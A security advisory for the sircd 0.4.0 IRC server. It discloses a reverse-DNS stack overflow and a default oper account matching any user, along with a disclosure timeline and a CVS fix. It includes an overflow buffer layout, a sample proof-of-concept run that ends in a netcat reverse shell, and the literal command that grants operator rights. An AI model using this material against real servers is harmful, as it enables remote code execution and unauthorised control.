I. BACKGROUND

According to the vendor "The 'sircd' project started as an idea from
the QuakeNet IRC Network coding team to develop a completely new irc
server that had none of the problems of the original ircd, such as
instability, scalability issues, redundant, badly written code and
other nasty things. "
More info is available at http://www.sircd.org.

II. DESCRIPTION

a: Insufficient bounds checking leads to execution of arbitrary code. 
b: Default oper account matching *!*@*

III. ANALYSIS

a:
Upon checking the reverse dns of a connecting user, if the returned
value is longer than a certain length a classic stack overflow occurs.

The buffer may be constructed as such:
[94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode],
leaving us with plenty of space both before and after eip to store our
shellcode. 

The accompanying .sh script is a silly proof of concept. 
Below is a fabricated copy of a typical run:

[shell 1]
$ nc -l -v -p 10000
listening on [any] 10000 ...

[shell 2]
# ./sircd.sh 127.0.0.1

sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker>

UID check passed, backing up /etc/hosts
Now connect to the sircd from 127.0.0.1
Press a key and enter to restore /etc/hosts
asd
Game over man, game over
#

[shell 3]
$ sircd &
[1] 75711
$

=====================================
 sircd:  v0.4.0 Alpha
 Author(s)
   Zarjazz (zarjazz@barrysworld.com)
=====================================
sircd initialized
SSL initialized

$ BitchX 127.0.0.1
[snip some bitchx output]
[fi]  *** Welcome to the_server
[fi]  *** Resolving IP 127.0.0.1
--from here on the connection freezes.

[shell 2]
fah
Game over man, game over
#

[shell 1]
connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
id
uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)

b: type /oper bod bod bod in a connected irc-client.

IV. DETECTION

sircd-0.4.0 shipping with FreeBSD ports as per 03/02-03 is found
to be vulnerable, as well as sircd-0.4.4 from CVS before 04/02-03.

V. WORKAROUND

The fix has been incorporated in the CVS tree as per 04/02-03.

VI. VENDOR FIX

Same as above.

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified.
04/02-02 zarjazz@barrysworld.com responded with a fix.
04/02-02 public disclosure.

IX. CREDIT

Knud Erik Højgaard